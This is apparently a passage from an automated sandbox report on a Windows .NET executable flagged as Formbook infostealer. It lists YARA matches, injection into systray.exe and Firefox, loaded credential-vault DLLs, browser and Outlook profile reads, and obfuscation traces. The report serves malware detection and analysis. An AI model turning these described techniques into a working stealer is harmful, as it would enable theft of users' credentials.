Source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: CMV610942X6UI.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, uqar9C3iDVsyoPkaSq.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, uqar9C3iDVsyoPkaSq.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, uqar9C3iDVsyoPkaSq.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.cs Security API names: _0020.SetAccessControl
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.cs Security API names: _0020.AddAccessRule
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.cs Security API names: _0020.SetAccessControl
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.cs Security API names: _0020.AddAccessRule
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.cs Security API names: _0020.SetAccessControl
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@9/8
Source: C:\Users\user\Desktop\CMV610942X6UI.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CMV610942X6UI.exe.log Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\systray.exe File created: C:\Users\user\AppData\Local\Temp\382-I9W6 Jump to behavior
Source: CMV610942X6UI.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: CMV610942X6UI.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: systray.exe, 00000008.00000002.3260476733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3260476733.0000000003506000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1968547818.0000000003506000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3260476733.0000000003511000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: CMV610942X6UI.exe ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Users\user\Desktop\CMV610942X6UI.exe "C:\Users\user\Desktop\CMV610942X6UI.exe"
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process created: C:\Users\user\Desktop\CMV610942X6UI.exe "C:\Users\user\Desktop\CMV610942X6UI.exe"
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process created: C:\Users\user\Desktop\CMV610942X6UI.exe "C:\Users\user\Desktop\CMV610942X6UI.exe" Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe" Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\CMV610942X6UI.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: CMV610942X6UI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: CMV610942X6UI.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: CMV610942X6UI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: systray.pdb source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261143467.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sxkr.pdbSHA256M source: CMV610942X6UI.exe
Source: Binary string: systray.pdbGCTL source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261143467.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sxkr.pdb source: CMV610942X6UI.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZkqZZBQxQqm.exe, 00000007.00000000.1716110923.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858183726.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: CMV610942X6UI.exe, 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1791760271.0000000005025000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1790150372.0000000004E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: CMV610942X6UI.exe, CMV610942X6UI.exe, 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1791760271.0000000005025000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1790150372.0000000004E7B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: CMV610942X6UI.exe, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.cs .Net Code: bfXHaECVJt System.Reflection.Assembly.Load(byte[])
Source: 0.2.CMV610942X6UI.exe.2a0c2d0.1.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.CMV610942X6UI.exe.2a0c2d0.1.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.cs .Net Code: bfXHaECVJt System.Reflection.Assembly.Load(byte[])
Source: 0.2.CMV610942X6UI.exe.5570000.4.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.CMV610942X6UI.exe.5570000.4.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.cs .Net Code: bfXHaECVJt System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: CMV610942X6UI.exe Static PE information: 0xBEB58238 [Sat May 23 00:26:32 2071 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0040D107 push ebp; iretd 3_2_0040D12B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0040CA69 push B786D1BCh; iretd 3_2_0040CA6E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00403340 push eax; ret 3_2_00403342
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0040CD74 push ecx; retf 3_2_0040CD75
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00413E5B push edi; retf 3_2_00413E60
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0041DF71 push edx; retf 3_2_0041DF6F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0041DF39 push edx; retf 3_2_0041DF6F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00419FF0 push es; retf 3_2_00419FF1
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F4225F pushad ; ret 3_2_00F427F9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F427FA pushad ; ret 3_2_00F427F9
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F4283D push eax; iretd 3_2_00F42858
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F709AD push ecx; mov dword ptr [esp], ecx 3_2_00F709B6
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F41200 push eax; iretd 3_2_00F41369
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_051D27FA pushad ; ret 8_2_051D27F9
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_051D225F pushad ; ret 8_2_051D27F9
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_052009AD push ecx; mov dword ptr [esp], ecx 8_2_052009B6
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_051D283D push eax; iretd 8_2_051D2858
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_051D1368 push eax; iretd 8_2_051D1369
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0324ABF6 push edx; retf 8_2_0324AC2C
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0325089E push ds; iretd 8_2_0325089F
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0324AC2E push edx; retf 8_2_0324AC2C
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_03246CAD push es; retf 8_2_03246CAE
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FC95D3 push cs; ret 8_2_04FC9617
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FC5563 push ebp; ret 8_2_04FC5564
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FC471D push cs; iretd 8_2_04FC4733
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FCE2F5 push cs; iretd 8_2_04FCE3B1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FCA28F push ds; iretd 8_2_04FCA29D
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FCE359 push cs; iretd 8_2_04FCE3B1
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FC6300 push ecx; ret 8_2_04FC6315
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FC0CBC pushfd ; iretd 8_2_04FC0CD0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04FC0CB2 pushfd ; iretd 8_2_04FC0CD0
Source: CMV610942X6UI.exe Static PE information: section name: .text entropy: 7.978260141852589
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, mFb9wARwNwaJe5w7ZV.cs High entropy of concatenated method names: 'zqCu8q5y6W', 'TULuiJGNsW', 'N08u67Rpjw', 'EcMullE9Vf', 'kJDux53Qo0', 'Tivu94lSr3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, QZC8Vgm38RMQqTFC0I.cs High entropy of concatenated method names: 'bhmpgxJDGX', 'Xh4pyFtcDj', 'y21pjWtxlD', 'HYojFb6fNN', 'WuxjzQLAnC', 'W0GpIYHvdA', 'g0lpPYtufT', 'IHgp04Ilk4', 'hKnptSWk86', 'NKipHVr3VA'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, wdwmQsS8tMhsauNIkb.cs High entropy of concatenated method names: 'G95jNHp6AC', 'ba9jLHZdOE', 'oV2jQqAGbs', 'ToString', 'prxj42nL5m', 'UKijXPoV8I', 's6E13wHgNWLacbRiBMF', 'KW3pASHRAeoV0c7nTk7', 'LGZm2LHrwsAitZOuTHS'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, xx0KhNYstrI8TI7Bnr.cs High entropy of concatenated method names: 'xl9t7BWZbQ', 'OCntg7F8PP', 'bCetKYilTO', 'moLtyXvmHq', 'ksJtWEvQn2', 'zW4tju3PFq', 'PGJtptW8lv', 'LyFtYN90u8', 'eYbtdeU5aG', 'xjxtwEepRp'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, QuvsOJLMp63DVZBfMB.cs High entropy of concatenated method names: 'NwnZwpPMui', 'JTCZ5H8J82', 'ToString', 'sGQZgZFC1Y', 'pH2ZKAFd5S', 'UG5ZymWfps', 'sRuZWNZtMD', 'SpEZjExbm4', 'IfqZpJXPCI', 'CWcZYD0ned'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, tHT8CVGRGX12Uy9q6l.cs High entropy of concatenated method names: 's09psEwZlS', 'URvphnah8v', 'SBkpaplUjE', 'e8ypbTCLkr', 'a8apO1cG7o', 'JZ4pJchb7m', 'tgHpCCnbwn', 'eI0p3aSH1T', 'Ve9pAwDOwS', 'HPypTbanWk'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, wjHVApHL5aYoBPGjHD.cs High entropy of concatenated method names: 'fHePpqar9C', 'HDVPYsyoPk', 'lODPw5LB2H', 'ynwP5unZA6', 'LkrPkFev9L', 'XndPrhBdq7', 'gTXwBKelHZ2HvdsqKA', 'CKTjfYIo4ovXGutMZA', 'dvdPPNdl7Y', 'XnjPtsI8c3'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, bPa2QExW5ojMAKvEve.cs High entropy of concatenated method names: 'e4tkUPc7hT', 'Wjekv9bNGd', 'SlEkxqIP9L', 'X3Ak2k0O5M', 'L2okijtBxa', 'Ei9k6jPSdW', 'FQAkl0h8lX', 'zSyk9bDerL', 'FP3kSE8uhR', 'zXUkmxgj1W'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, BxUmT6KabXkxnurDhm.cs High entropy of concatenated method names: 'Dispose', 'd7PPRwZyDk', 'uGy0iZ0fmT', 'AhuUUYKuvY', 'qPcPF8Uw5t', 'hUyPzgwOd2', 'ProcessDialogKey', 'zBw0IFb9wA', 'lNw0PaJe5w', 'eZV00mC84m'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, qLhyZwAOD5LB2Hhnwu.cs High entropy of concatenated method names: 'ujZybAxNEp', 'ma5yJ6WhjV', 'Gwmy3QPjpy', 'sxRyAoNsfY', 'jMTykZFWl9', 'sQKyr6yF4o', 'f4tyZM51d5', 'G0EyulQJnu', 'wX2yEh12jR', 'N9CyoGrih8'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, uqar9C3iDVsyoPkaSq.cs High entropy of concatenated method names: 'viTKxn3xju', 'piHK2h12rx', 'MBIKN36Sfu', 'IY0KLthUvV', 'jDnKQ5AW0d', 'pmYK4ekwnT', 'qVEKXeakwi', 'Ry8KfNfZL6', 'Cp2KRIro1Z', 'DhFKFb160r'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, tojMPAPIFWIQ7h6ZKOd.cs High entropy of concatenated method names: 'HZBEswU9aU', 'pvQEh3UPfc', 'oa2EamMZ1q', 'yn1EbOlt4r', 'DG8EOC9At4', 'rJlEJCMO22', 'uZ9ECYxPlL', 'bnbE3SnylG', 'miUEA5nO5B', 'yPaETdulDk'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, t5ATJRPtXI2sMd8MoI7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VINoxpC6CR', 'd49o29oiVL', 'SEPoNulq1G', 'zRUoLyMV35', 'IZIoQGuQmr', 'ueno4pKYtA', 'zYToX62Byx'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, bc8Uw5ftWUygwOd2hB.cs High entropy of concatenated method names: 'XeGugm0gT1', 'lLhuKRAkxc', 'e58uy23GDM', 'C47uWsdjQ5', 'jsnujRw751', 'NWHupgHEmh', 'Ht3uYEXyYG', 'yujudWwqWp', 'A7euwER0Mn', 'op2u5HbAMQ'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, pgN0ik0xr8ZdYvmMlB.cs High entropy of concatenated method names: 'LsQanhhR2', 'l8IbJk5Es', 'YrbJGX66K', 'ryJCipret', 'L19AtiD4O', 'z5nTcCpS9', 'Sq8pt8T6T2Q7AyTqpl', 'UvchEkiENYb7URxVs4', 'o99u3S3N6', 'EVeo6sVUm'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, vZA6ivT8rHvUbMkrFe.cs High entropy of concatenated method names: 'jFAWOJgi1P', 'rb4WCv32AV', 'qVly6L9oKi', 'FKUylXfPH9', 'siOy9UiZmd', 'JDjySqWoIi', 'hxyymr2RVH', 'HSwyMwABGA', 'bZdyGPcyHK', 'mspyUpsrfg'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, zpnUutyO1DyuGC9q5s.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jU70RxsGr6', 'JMk0FH9vIp', 'kAP0z1Bbhs', 'TYntIlb6hC', 'QiptPeGmQN', 'I82t0DbBLk', 'PjXttcGIZP', 'NYqw032oTYOkrC3y4Ts'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, cV3u6S4Dgqd6WRDw3L.cs High entropy of concatenated method names: 'LD6ZfdhYFc', 'o6lZF2oVeI', 'C8xuIHXQA4', 'tnOuPKVvab', 'Ef9Z1keglY', 'ifwZvDfWlP', 'cEfZBfjm8T', 'C0UZx8TQZt', 'RcPZ2iAtgF', 'PgUZNXwWJ6'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, P9LRnd8hBdq7ZDX3Nv.cs High entropy of concatenated method names: 'UMBj7GaFBB', 'pVSjKuh2Bj', 'f9rjW9kwX2', 'Gj0jpsKPO3', 'fqVjYfNyBU', 'O4QWQRVshS', 'BnXW4epvuu', 'oauWXQIKRM', 'eLCWfRhYZs', 'HYMWRm9E5o'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, DloH6yB4mxp36pGqUr.cs High entropy of concatenated method names: 'N12D3VqyAR', 'pUUDAEIntj', 'ihRD8ImQef', 'xVYDiQiy7s', 'F4fDlIIT5O', 'CN5D9EGbQQ', 'I83Dm5uwxH', 'm04DMlvmEq', 'lCUDUhhWRB', 'fxCD1G304G'
Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, LC84mQFdFur2ZUv2lS.cs High entropy of concatenated method names: 'BOuEP8EQYO', 'eNeEt05trw', 'sd2EHWrZGI', 'LRLEgfu66q', 'OSbEKYnSuu', 'H2xEWo6cKi', 'GsZEj9McMD', 'GUfuXTdMvB', 'HXnufpMTUF', 'skauRHNtlE'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, mFb9wARwNwaJe5w7ZV.cs High entropy of concatenated method names: 'zqCu8q5y6W', 'TULuiJGNsW', 'N08u67Rpjw', 'EcMullE9Vf', 'kJDux53Qo0', 'Tivu94lSr3', 'Next', 'Next', 'Next', 'NextBytes'
